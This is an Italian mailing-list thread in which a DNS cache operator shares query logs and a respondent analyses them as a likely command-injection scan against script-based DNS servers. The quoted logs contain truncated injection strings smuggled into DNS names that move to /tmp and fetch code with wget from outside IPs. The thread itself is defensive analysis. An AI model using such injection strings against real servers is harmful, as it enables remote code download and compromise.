Hai provato a mettere gli ip listati in qualche sito di reputation check? Qualche ricerca a caso mi ha portato qui
http://www.senderbase.org/lookup/?search_string=105.226.91.155 che indica che l'ip e' in lista nera in 2 blacklist su 4. Diciamo che mi farebbe pensare che quelle siano macchine compromesse e che quindi sia effettivamente un tentativo di cmd injection. Probabilmente c'e' qualche dns server vulnerabile a questo semplice attacco e ne stanno cercando esemplari a tappeto. Sempre a naso direi anche che visti i backtick del comando potrebbe trattarsi di un dns server scritto in qualche linguaggio di scripting. Per esempio in ruby un codice tipo quello _potrebbe_ funzionare. 2017-02-14 15:25 GMT+01:00 Lorenzo Mainardi <[email protected]>: > Buonasera a tutti, > gestisco un server DNS cache per diverse migliaia di utenti broadband e mi > ritrovo nei log delle query di questo tipo: > > 15:11:14.531518 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9169+ A? `cd > /tmp;wget http://105.226.91.155. (53) > 15:11:14.549417 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9170+ A? `cd > /tmp;wget http://105.226.91.155. (53) > 15:11:14.567374 IP x.y.z.k.wifree > my.dns.cache.only.domain: 9171+ A? `cd > /tmp;wget http://105.226.91.155. (53) > 15:11:17.792996 IP e.f.g.h.11783 > my.dns.cache.only.domain: 212+ A? `cd > /tmp;wget http://36.107.97.237:. (53) > 15:11:18.313564 IP a.b.c.e.11080 > my.dns.cache.only.domain: 1069+ A? `cd > /tmp;wget http://84.9.195.97:27. (53) > 15:11:26.300024 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1299+ A? `cd > /tmp;wget http://2.186.193.103:. (53) > 15:11:26.318653 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1300+ A? `cd > /tmp;wget http://2.186.193.103:. (53) > 15:11:26.337361 IP a.b.c.d.15489 > my.dns.cache.only.domain: 1301+ A? `cd > /tmp;wget http://2.186.193.103:. (53) > > Che cosa pensate possano essere? Tentativi di command injection? > รจ la prima volta che mi capita di vedere delle query del genere. > > -- > LORENZO MAINARDI > >
